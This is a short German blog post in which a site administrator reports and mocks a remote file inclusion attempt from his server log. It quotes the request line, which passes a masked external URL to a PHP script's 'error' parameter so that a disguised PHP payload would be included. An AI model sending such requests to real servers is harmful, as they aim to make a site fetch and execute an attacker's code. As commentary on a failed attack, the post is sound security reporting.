Wird ja immer kreativer hier… Soeben schleicht sich folgende Zeile ins Log:

"GET /files/tools/****/errors.php?error=http://***.com.ar/images/idia.jpg??? HTTP/1.1" 404 319 "-" "libwww-perl/5.79"

Hinter dem JPEG verbirgt sich ein PHP-Quelltext, welcher mit
echo "NigeriaN HackerS TeaM";
endet

Netter Versuch, aber blind Dateien per $_GET includen hat sich selbst mein Azubi abgewöhnt und register_globals habe ich seit Jahren nirgendwo mehr aktiv gesehen. Dummerweise ist die Whois-Datenbank für .com.ar momentan down, sonst hätte ichs mal beim Provider versucht. So bleibt mir nur es MkSwap gleich zu tun und dem NHT einen schönen Tag zu wünschen…